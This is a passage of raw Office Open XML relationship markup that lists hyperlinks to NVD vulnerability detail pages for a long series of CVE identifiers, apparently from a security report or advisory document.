Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27554" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27555" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27556" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27558" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27559" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43686" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43815" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47094" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55416" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61599" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63506" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65374" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65390" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65391" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73173" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75624" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76059" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76409" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78088" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78569" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78571" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78575" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79742" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81048" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81211" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81550" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81940" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81941" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82095" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82097" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82098" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82099" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82964" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83941" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84858" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84860" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85168" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85731" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86865" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87105" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88064" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89084" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89774" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89777" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89804" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89811" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89844" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89849" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89860" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89898" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89907" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89908" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89913" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89928" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89929" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89932" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89951" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89957" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89959" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89960" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89995" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90000" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90018" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90041" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92122" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92123" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92124" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92125" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92137" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92466" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92566" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92580" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92592" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92593" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92748" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92761" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92762" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92780" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92788" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92796" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92801" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-39896" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40854" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59879" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73174" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73464" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75516" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77404" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82028" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82410" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82762" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82766" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82770" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82772" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82774" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82777" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82779" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82780" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82787" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82789" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82791" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82794" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84408" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85617" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86106" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86831" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87995" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88263" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88817" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90776" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92355" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19535" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20135" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20154" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20249" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20250" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20295" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20352" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4129" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54628" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56100" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73163" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73164" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73165" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73166" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73167" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73170" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73171" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73176" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73177" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73454" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78375" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81213" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82765" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82768" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82793" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85979" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86762" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86770" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90608" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90932" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91098" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91105" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92576" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55072" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70341" TargetMode="External" Id="rId320" /><Relationship 